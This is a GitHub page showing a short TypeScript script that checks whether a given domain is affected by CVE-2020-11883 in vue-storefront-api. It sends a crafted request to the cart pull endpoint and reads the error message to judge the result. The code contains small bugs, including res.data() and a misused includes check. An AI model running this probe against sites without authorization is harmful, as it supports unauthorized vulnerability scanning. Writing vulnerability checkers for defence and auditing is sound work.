-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.ts
67 lines (56 loc) · 1.53 KB
/
index.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import axios, { AxiosResponse } from "axios";
import chalk from "chalk";
/**
*
* @author Ondřej Klapka <ja@oklapka.tech>
* @date 1.3 2021
*
*/
const domain = process.argv[2];
const processRequest = async (url: string) => {
try {
const res = await axios.request({
method: "GET",
url: "https://" + domain + "/" + url,
headers: {
Host: domain,
Accept: "/",
"Content-Type": "application/json",
Origin: "https://" + domain,
"Content-Length": "2",
},
data: "\x0d\x0a",
});
return res.data();
} catch (error) {
const response = error.response as AxiosResponse<any>;
return response.data.result;
}
};
const sendRequest = () => processRequest("api/cart/pull?token=&cartId=");
const validateSum = (response: string) => {
if (response == "Cannot read property '1' of null") {
return 0;
} else if (response.includes("TypeError" || "firstchar")) {
return 1;
} else {
return 0;
}
};
const test = async () => {
console.log(
chalk.yellow.underline("Running the vulnerability: CVE-2020-11883")
);
const res = await sendRequest();
console.log(chalk.blue(domain));
console.log(chalk.yellow.underline("Checking the vulnerability"));
console.log(chalk.white(validateSum(res)));
console.log("");
console.log(
validateSum(res) > 0
? chalk.red( chalk.bgCyan(res) + "\nThe website is vulnerable! Update vue-storefront-api!")
: chalk.green("The website is secured against this attack!")
);
};
test();
export default test;